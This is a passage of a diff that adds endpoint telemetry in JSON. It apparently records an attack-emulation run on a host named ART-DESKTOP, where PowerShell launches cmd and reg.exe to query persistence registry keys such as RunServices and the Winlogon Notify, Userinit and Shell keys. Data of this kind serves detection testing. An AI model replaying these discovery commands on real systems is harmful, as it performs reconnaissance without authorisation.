2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5276, + "ppid": 2528, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "process", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "process", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": 
"terminate", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6296, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311970000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311990000, + 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5520, + "ppid": 6296, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312070000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": 
"C:\\Windows\\System32\\KernelBase.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "process", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312140000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "process", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1860, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312230000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + 
"image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6328, + "ppid": 1860, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312320000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": 
"C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" 
+ }, + { + "event_type": "process", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "process", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 524, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312470000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 524, + "process_name": "cmd.exe", + 
"process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6052, + "ppid": 524, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312560000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + 
"image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "process", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "process", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4072, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312720000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 
131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1980, + "ppid": 4072, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312810000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + 
"image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1980, + "process_name": 
"reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "process", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "process", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "command_line": 